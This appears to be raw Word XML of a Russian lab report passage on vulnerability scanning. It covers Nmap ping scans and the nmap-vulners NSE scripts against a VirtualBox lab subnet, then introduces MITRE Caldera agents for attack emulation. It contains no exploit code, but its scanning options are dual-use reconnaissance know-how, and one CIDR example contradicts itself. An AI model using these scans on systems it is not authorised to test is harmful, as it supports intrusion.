        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="__RefHeading___Toc1344_3290770187"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Поиск уязвимо</w:t>
      </w:r>
      <w:r>
        <w:t>стей: Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для первичного поиска уязвимостей будет использоваться популярный и функциональный сканер Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap («Network Mapper») - это утилита с открытым исходным кодом для исследования сети и проверки безопасности. Она была разработана для быстрого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сканирования больших сетей, хотя прекрасно справляется и с единичными целями. Nmap использует "сырые" IP пакеты оригинальным способом, чтобы определить какие хосты доступны в сети, какие службы (название приложения и версию) они предлагают, какие операцион</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ные системы (и версии ОС) они используют, какие типы пакетных фильтров/брандмауэров используются и ещё множество других характеристик. В то время, как Nmap обычно используется для проверки безопасности, многие системные администраторы находят ее полезной д</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ля обычных задач, таких как контролирование структуры сети, управление расписаниями запуска служб и учёт времени работы хоста или службы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="__RefHeading___Toc1604_3290770187"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t>Определение цели сканирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В командной строке Nmap все, что не является опцией (или аргументом опции), рассматривае</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тся как цель сканирования. В простейшем случае для сканирования используется IP адрес или сетевое имя целевой машины.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Иногда необходимо просканировать целую сеть. Для этого Nmap поддерживает CIDR адресацию. Вы можете добавить /&lt;кол-во бит&gt; к IP адресу или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сетевому имени и Nmap просканирует каждый IP адрес, для которого первые &lt;кол-во бит&gt; такие же как и у заданного хоста. Например, 192.168.10.0/24 просканирует 256 хостов между 192.168.10.0, при записи типа 192.168.10.0/16 будет произведено сканирование 65,5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">36 IP адресов между 64.13.0.0 и 64.13.255.255. Наименьшее допустимое значение /0, при котором будет просканирован весь Интернет. Наибольшее значение /32, при котором </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>будет просканирован только заданный хост или IP адрес, т.к. все адресные биты заблокирован</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В нашем случае мы будем сканировать подсеть с адресом и маской 192.168.56.0/24, эта подсеть обусловлена настройками сетевых интерфейсов в VirtualBox и на сканируемых хостах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="__RefHeading___Toc1606_3290770187"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t>Обнаружение хостов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Одна из первейших задач при исследовании любой сети это сокр</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>атить (иногда довольно большой) набор IP диапазонов до списка активных или интересных хостов. Сканирование каждого порта каждого IP адреса медленно и необязательно. Конечно же то, что делает хост интересным для исселедования во многом определяется целями с</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>канирования. Сетевые администраторы возможно будут заинтересованы только в хостах, на которых запущена определенная служба, в то время как тем, кого интересует безопасность, будут интересны все устройства с IP адресами. Задачи администраторов по обнаружени</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю работающих хостов в сети могут быть удовлетворены обычным ICMP пингом, людям же, которые тестируют способность сети противостоять атакам из вне, необходимо использовать разнообразные наборы запросов с целью обхода брандмауэра.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>По умолчанию после обнаруже</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ния хостов Nmap начинает сканирование портов каждой активной машины. Так будет, даже если вы укажите на использование нестандартных методов обнаружения хостов, например, с использованием UDP запросов (-PU). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для ускорения сканирования и составления списка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хостов мы будем использовать опцию:  -sP (Пинг сканирование)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Эта опция указывает Nmap произвести пинг сканирование (определение хостов), а затем вывести список доступных хостов, т.е. тех, которые ответили </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>на запросы. Определение маршрутов и NSE скрипты так</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>же используются, если необходимо, однако дальнейшее тестирование (как сканирование портов или определение ОС) не производится. По умолчанию эта опция считается как бы на один шаг более тщательной, чем сканирование с целью составления простого списка хостов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, и может быть использована в этих же целях. Она позволяет произвести исследование целевой сети без привлечения внимания. Знание, какие хосты в сети в данный момент работают, для атакующих ценне, чем просто список IP адресов и сетевых имен, предоставляемых</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> опцией -sL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>По умолчанию опцией -sP посылаются запрос на ICMP это ответ и TCP ACK пакет на порт 80. Когда используется непривилегированным пользователем, посылается только SYN пакет (используя системные вызов connect) на порт 80 целевой машины. Когда прив</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">илегированный пользователь производит сканирование целей локальной сети, то используются ARP запросы. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="__RefHeading___Toc907_3518165554"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t>Скрипт для поиска уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:tab/>
        <w:t>Для поиска уязвимостей CVE используются криптовый движок Nmap (NSE), это одна из наиболее мощных и гибких возможностей Nma</w:t>
      </w:r>
      <w:r>
        <w:t>p. Он позволяет пользователям писать (и делиться ими) простые скрипты (используя язык программирования Lua, ) для автоматизации широкого круга сетевых задач. Эти скрипты выполняются со скоростью и эффективность ожидаемой вами от Nmap. Пользователи могут ис</w:t>
      </w:r>
      <w:r>
        <w:t>пользовать разнообразный и постоянно расщиряющийся набор скриптов, которые поставляются вместе с Nmap, или написать свои скрипты под свои собственные нужды.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE </w:t>
      </w:r>
      <w:r>
        <w:t>означает</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Common Vulnerabilities and Exposures»(</w:t>
      </w:r>
      <w:r>
        <w:t>Общие</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>уязвимости</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>риски</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:t>Э</w:t>
      </w:r>
      <w:r>
        <w:t>то способ систематизировать и классифицировать уязвимости программного обеспечения. Эта информация может быть очень полезна исследователям безопасности и пентестерам в их повседневных задачах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Сочетание NSE скриптов и базы данных CVE даёт инструмент, спос</w:t>
      </w:r>
      <w:r>
        <w:t>обный значительно расширить основные функции Nmap и предоставить информацию об уязвимостях в службах, запущенных на хосте.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Мы будем использовать скрипты Namp-vulners, работающие на базе данных уязвимостей Vulners.com, содержащей в себе большое количество </w:t>
      </w:r>
      <w:r>
        <w:t>известных уязвимостей и общедоступных эксплойтов для них.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Установка осуществляется из репозитория:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:hyperlink>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/vulnersCom/nmap-vulners.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>в папку с установленным Nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>/usr/share/nmap/scripts/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Для запуска поиска уязвимосте нео</w:t>
      </w:r>
      <w:r>
        <w:t>бходимо использовать следующие параметры сканирования:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>-sV — для определения службы и её версии</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>--script nmap-vulners/ — для запуска скриптов поиска уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>--script-args mincvss=7 — для поиска уязвимостей с высоким риском</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Результат сканирования им</w:t>
      </w:r>
      <w:r>
        <w:t>еет следующий формат вывода:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="14" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>66040</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>82550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5896610" cy="2909570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="1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8427" t="18632" r="34272" b="34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20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="__RefHeading___Toc1608_3290770187"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Эксплуатация уязвимостей: Mitre Caldera</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Mitre Caldera (далее Калдера)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – это платформа, разработанная командой Mitre Corporation, которая предоставляет средства для моделирования и анализа тактик, техник и процедур (TTP) кибератак. Это мощное приложение, которое используется в целях улучшения защиты информационных систем пут</w:t>
      </w:r>
      <w:r>
        <w:t>ём предоставления инсайтов о том как работают киберугрозы и какие меры предосторожности можно принять.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Калдеры имеет набор плагинов, позволяющий автоматизировать  действия выполняемые злоумышленниками на всех этапах атаки: от сбора информации до удаления </w:t>
      </w:r>
      <w:r>
        <w:t>следов проникновения в систему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>В данной работе нас будет интересовать раздел Champings и его подразделы Agents, Abilities, Adversaries, Operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-9525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-33655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5913755" cy="3709670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="2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8541" r="39563" b="43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097" w:rsidRDefault="00C26DD2">
      <w:bookmarkStart w:id="7" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="__RefHeading___Toc909_3518165554"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Agents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t>Одним из ключевых компонентов Mitre Cal</w:t>
      </w:r>
      <w:r>
        <w:t>dera являются агенты – программные модули, которые развертываются на целевых системах с целью эмуляции поведения киберугроз и симуляции различных видов атак. Агенты предоставляют платформе доступ к целевым системам и позволяют проводить тестирование и анал</w:t>
      </w:r>
      <w:r>
        <w:t>из безопасности в контролируемой среде.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t>Ключевые характеристики агентов в Mitre Caldera включают в себя:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Многоуровневость</w:t>
      </w:r>
      <w:r>
        <w:t>: Агенты Mitre Caldera работают на различных уровнях системы, начиная от низкоуровневых сетевых операций и заканчивая воздействием на п</w:t>
      </w:r>
      <w:r>
        <w:t>рикладные программы и службы. Это позволяет эмулировать разнообразные сценарии атак и анализировать их воздействие на различные компоненты информационной инфраструктуры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Расширяемость</w:t>
      </w:r>
      <w:r>
        <w:t>: Платформа позволяет разработчикам создавать собственные агенты или расш</w:t>
      </w:r>
      <w:r>
        <w:t>ирять функциональность существующих. Это обеспечивает гибкость и возможность адаптации Mitre Caldera к специфическим потребностям пользователей и сценариям атак.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Конфигурируемость</w:t>
      </w:r>
      <w:r>
        <w:t>: Пользователи могут настраивать поведение агентов с учетом целей тестировани</w:t>
      </w:r>
      <w:r>
        <w:t>я и исследования. Это включает в себя выбор конкретных TTP для эмуляции, настройку параметров атаки и реакции на обнаружение защитных мер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Сетевая активность</w:t>
      </w:r>
      <w:r>
        <w:t>: Агенты Mitre Caldera активно взаимодействуют с сетевой инфраструктурой, имитируя сетевые операции</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атакующего. Это включает в себя отправку и перехват сетевого трафика, подмену данных, сканирование сети и другие действия, характерные для кибератак.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Разнообразие возможностей</w:t>
      </w:r>
      <w:r>
        <w:t>: Агенты обладают различными функциональными возможностями, включая выполнение э</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ксплоитов, управление файлами и процессами, изменение конфигурации системы и </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>многое другое. Это позволяет создавать разнообразные сценарии атак и анализировать их воздействие на целевые системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t>В целом, агенты Mitre Caldera играют ключевую роль в процессе</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> анализа киберугроз и улучшения кибербезопасности путем предоставления доступа к целевым системам и эмуляции поведения потенциальных атакующих. Их гибкость, расширяемость и многофункциональность делают их важным инструментом для специалистов по информацион</w:t>
      </w:r>
      <w:r>
        <w:t>ной безопасности, которые стремятся повысить эффективность своих защитных мер и снизить риск инцидентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097"/>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="__RefHeading___Toc930_3518165554"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t>Ability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:r>
        <w:t>Платформа Mitre Caldera обладает широким набором возможностей, которые позволяют пользователям моделировать различные аспекты кибератак и анал</w:t>
      </w:r>
      <w:r>
        <w:t>изировать их воздействие на информационные системы. Возможности Mitre Caldera включают в себя:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Эмуляция атакующих тактик, техник и процедур (TTP)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
